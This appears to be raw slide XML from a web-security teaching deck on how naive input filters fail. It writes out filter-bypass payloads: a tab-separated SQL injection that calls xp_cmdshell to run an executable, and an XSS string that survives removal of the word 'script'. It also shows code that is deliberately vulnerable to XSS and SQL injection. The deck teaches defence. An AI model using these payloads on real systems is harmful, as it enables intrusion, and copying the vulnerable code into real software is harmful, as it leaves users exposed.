            <a:endParaRPr lang="en-NZ" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Eurostile" pitchFamily="34" charset="0"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="-180000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Eurostile" pitchFamily="34" charset="0"/>
              <a:buChar char=":"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Eurostile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13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Faulty Filters Worse Than No Filters</a:t>
            </a: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847207"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>cleanrequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>lcase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>instr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>,";") &gt; 0 then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = left(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID,instr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>,";")-1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	end if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>instr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>,"exec ") &gt; 0 then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = left(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID,instr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>,"exec ")-1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	end if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6686551" y="1971675"/>
            <a:ext cx="2214562" cy="785813"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -213390"/>
              <a:gd name="adj2" fmla="val -3404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Function To Filter User Input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686551" y="2895600"/>
            <a:ext cx="2214562" cy="862013"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -181131"/>
              <a:gd name="adj2" fmla="val -5464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Looks For The Use Of A Semi Colon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757988" y="4038600"/>
            <a:ext cx="2143124" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -162636"/>
              <a:gd name="adj2" fmla="val -455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Looks For The Term exec followed by a space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714374" y="5714999"/>
            <a:ext cx="8258175" cy="714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This Filter Can Be Bypassed By Using A Tab Character As A Separator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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.aspx?theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1%09exec%09xp_cmdshell ‘serverpwnage.exe’;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4374" y="1447800"/>
            <a:ext cx="8186738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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.aspx?theID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1;exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘serverpwnage.exe’;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15549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Faulty Filters Worse Than No Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9218" name="Content Placeholder 1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508653"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-NZ" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>displayText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>str_ireplace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>("script", "",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>	echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlInput</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-NZ" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="2064545"/>
            <a:ext cx="2071687" cy="928688"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -138981"/>
              <a:gd name="adj2" fmla="val 281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Function To Display User Input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858000" y="3581400"/>
            <a:ext cx="2071687" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -149985"/>
              <a:gd name="adj2" fmla="val -5897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Looks For The Term script And Remove It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191000" y="4491038"/>
            <a:ext cx="2214562" cy="1071562"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -100702"/>
              <a:gd name="adj2" fmla="val -9084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Display The Filtered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714375" y="5638800"/>
            <a:ext cx="7786688" cy="790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These Types Of Filters Are Just Rubbish!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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.php?htmlInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sscriptcript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;alert()&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sscriptcript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="20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4375" y="1450181"/>
            <a:ext cx="8215312" cy="531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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.php?htmlInput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script&gt;alert()&lt;/script&gt;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58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 smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="C:\Users\shernan\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZB0MPM8Y\MCj04042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2949" y="1591503"/>
            <a:ext cx="3663051" cy="436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4651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3900" y="1981200"/>
            <a:ext cx="7620000" cy="3048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 &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        &lt;%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>          String username = (String) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>request.getAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("username");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        &lt;h2&gt;Hello World! &lt;%=username%&gt;&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    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Web Attack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206779"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="449263" y="1598613"/>
          <a:ext cx="8229600" cy="425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5218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3900" y="1981200"/>
            <a:ext cx="7620000" cy="3048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 &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        &lt;%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>          String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username = (String) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request.getAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("username")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%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>        &lt;h2&gt;Hello World! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;%=username%&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    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3900" y="1676400"/>
            <a:ext cx="7620000" cy="419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StudentDAO.java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>public String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchSubject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        String id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ParamUtil.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("id");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "select new com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fwtest.database.BO.Subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>su.subjectCode,su.subjectName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                + " from Subject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StudentSubject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                + " where ss.id.id = " + id + " and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>su.subjectCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ss.id.subjectCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getSession</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        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sess.createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlQuery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jsonDataGrid.setItems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>query.list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>());</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>forwardJson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720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3900" y="1676400"/>
            <a:ext cx="7620000" cy="419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StudentDAO.java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>public String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>searchSubject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        String id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ParamUtil.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("id");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "select new com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fwtest.database.BO.Subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>su.subjectCode,su.subjectName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                + " from Subject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>StudentSubject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                + " where ss.id.id = " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + " and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>su.subjectCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ss.id.subjectCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
